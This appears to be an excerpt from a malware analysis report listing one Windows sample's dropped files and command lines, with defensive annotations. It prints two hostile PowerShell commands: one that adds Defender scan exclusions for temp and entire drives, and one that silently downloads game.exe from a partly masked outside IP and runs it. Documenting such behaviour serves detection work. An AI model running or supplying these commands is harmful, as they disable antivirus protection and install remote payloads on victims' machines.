Technical Information
- '%TEMP%\x.exe'
- %TEMP%\x.exe
- %TEMP%\ysloges.bat
- nul
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\ysloges.bat" "
- '<SYSTEM32>\openfiles.exe'
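- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden Add-MpPreference -ExclusionPath $env:temp,C:\,D:\,E:\,H:\,<Drive name for removable media>:\,G:\ -Force
  (Adds Microsoft Defender scan exclusions for the temp directory and the listed drive roots, so files under those paths are no longer scanned. An exclusion that covers an entire drive root is a strong detection signal in Defender configuration-change and PowerShell logs.)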
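- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -executionpolicy bypass -WindowStyle Hidden Invoke-WebRequest -uri "http://5.###.42.104/game.exe" -OutFile "$env:temp\game.exe";iex $env:temp\game.exe
  (Downloads game.exe over unencrypted HTTP into the temp directory and then runs it through iex, with the execution policy bypassed and the window hidden. The host address is partially masked in this report.)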